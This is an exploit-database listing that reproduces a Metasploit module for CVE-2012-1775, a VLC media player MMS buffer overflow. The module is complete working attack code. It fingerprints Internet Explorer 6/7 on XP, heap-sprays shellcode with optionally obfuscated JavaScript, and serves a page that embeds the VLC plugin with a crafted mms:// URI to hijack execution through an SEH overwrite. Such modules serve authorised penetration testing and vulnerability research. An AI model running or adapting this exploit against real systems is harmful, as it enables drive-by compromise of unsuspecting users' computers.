VLC MMS Stream Handling Buffer Overflow



EKU-ID: 2055 CVE: 2012-1775 OSVDB-ID: 80188
Author: sinn3r Published: 2012-05-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpServer::HTML

 def initialize(info={})
  super(update_info(info,
   'Name'        => "VLC MMS Stream Handling Buffer Overflow",
   'Description' => %q{
     This module exploits a buffer overflow in VLC media player VLC media player prior
    to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result
    in a stack buffer overflow when handling a malicious MMS URI.

    This module uses the browser as attack vector. A specially crafted MMS URI is
    used to trigger the overflow and get flow control through SEH overwrite. Control
    is transferred to code located in the heap through a standard heap spray.

    The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.
   },
   'License'     => MSF_LICENSE,
   'Author'      =>
    [
     'Florent Hochwelker', # aka TaPiOn, Vulnerability discovery
     'sinn3r', # Metasploit module
     'juan vazquez' # Metasploit module
    ],
   'References' =>
    [
     ['CVE', '2012-1775'],
     ['OSVDB', '80188'],
     ['URL', 'http://www.videolan.org/security/sa1201.html'],
     # Fix commit diff
     ['URL', 'http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c']
    ],
   'Payload' =>
    {
     'BadChars'        => "\x00",
     'Space'           => 1000,
    },
   'DefaultOptions' =>
    {
     'ExitFunction' => "process",
     'InitialAutoRunScript' => 'migrate -f',
    },
   'Platform' => 'win',
   'Targets'  =>
    [
     # Tested with VLC 2.0.0
     [ 'Automatic', {} ],
     [
      'Internet Explorer 6 on XP SP3',
      {
       'Rop' => false,
       # Space needed to overflow and generate an exception
       # which allows to get control through SEH overwrite
       'Offset' => 5488,
       'OffsetShell' => '0x800 - code.length',
       'Blocks' => '1550',
       'Padding' => '0'
      }
     ],
     [
      'Internet Explorer 7 on XP SP3',
      {
       'Rop' => false,
       # Space needed to overflow and generate an exception
       # which allows to get control through SEH overwrite
       'Offset' => 5488,
       'OffsetShell' => '0x800 - code.length',
       'Blocks' => '1600',
       'Padding' => '1'
      }
     ]
    ],
   'DisclosureDate' => "Mar 15 2012",
   'DefaultTarget' => 0))

  register_options(
   [
    OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
   ], self.class)
 end

 def get_target(cli, request)
  #Default target
  my_target = target

  vprint_status("User-Agent: #{request.headers['User-Agent']}")

  if target.name == 'Automatic'
   agent = request.headers['User-Agent']
   if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
    #Windows XP + IE 6
    my_target = targets[1]
   elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
    #Windows XP + 7.0
    my_target = targets[2]
   else
    #If we don't recognize the client, we don't fire the exploit
    my_target = nil
   end
  end

  return my_target
 end

 def on_request_uri(cli, request)
  #Pick the right target
  my_target = get_target(cli, request)
  if my_target.nil?
   vprint_error("Target not supported")
   send_not_found(cli)
   return
  end

  vprint_status("URL: #{request.uri.to_s}")

  #ARCH used by the victim machine
  arch = Rex::Arch.endian(my_target.arch)
  nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
  code = Rex::Text.to_unescape(payload.encoded, arch)

  # Spray overwrites 0x30303030 with our payload
  spray = <<-JS
  var heap_obj = new heapLib.ie(0x20000);
  var code = unescape("#{code}");
  var nops = unescape("#{nops}");

  while (nops.length < 0x80000) nops += nops;
  var offset = nops.substring(0, #{my_target['OffsetShell']});
  var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

  while (shellcode.length < 0x40000) shellcode += shellcode;
  var block = shellcode.substring(0, (0x80000-6)/2);

  heap_obj.gc();
  for (var i=0; i < #{my_target['Blocks']}; i++) {
   heap_obj.alloc(block);
  }
  JS

  #Use heaplib
  js_spray = heaplib(spray)

  #obfuscate on demand
  if datastore['OBFUSCATE']
   js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
   js_spray.obfuscate
  end


  src_ip = Rex::Socket.source_address.split('.')
  hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join
  # Try to maximize success on IE7 platform:
  # If first octet of IP address is minor than 16 pad with zero
  # even when heap spray could be not successful.
  # Else pad following target heap spray criteria.
  if ((hex_ip.to_i(16) >> 24) < 16)
   padding_char = '0'
  else
   padding_char = my_target['Padding']
  end

  hex_ip = "0x#{padding_char * my_target['Offset']}#{hex_ip}"

  html = <<-EOS
  <html>
    <head>
    <script>
   #{js_spray}
    </script>
    </head>
  <body>
  <OBJECT classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
   codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"
   width="320"
   height="240"
   id="vlc" events="True">
   <param name="Src" value="mms://#{hex_ip}:#{datastore['SRVPORT']}" />
   <param name="ShowDisplay" value="True" />
   <param name="AutoLoop" value="False" />
   <param name="AutoPlay" value="True" />
   <EMBED pluginspage="http://www.videolan.org"
    type="application/x-vlc-plugin" progid="VideoLAN.VLCPlugin.2"
    width="320"
    height="240"
    autoplay="yes"
    loop="no"
    target="mms://#{hex_ip}:#{datastore['SRVPORT']}"
    name="vlc">
   </EMBED>
  </OBJECT>


  </body>
  </html>
  EOS

  #Remove extra tabs in HTML
  html = html.gsub(/^\t\t/, "")

  print_status("Sending malicious page")
  send_response( cli, html, {'Content-Type' => 'text/html'} )
 end
end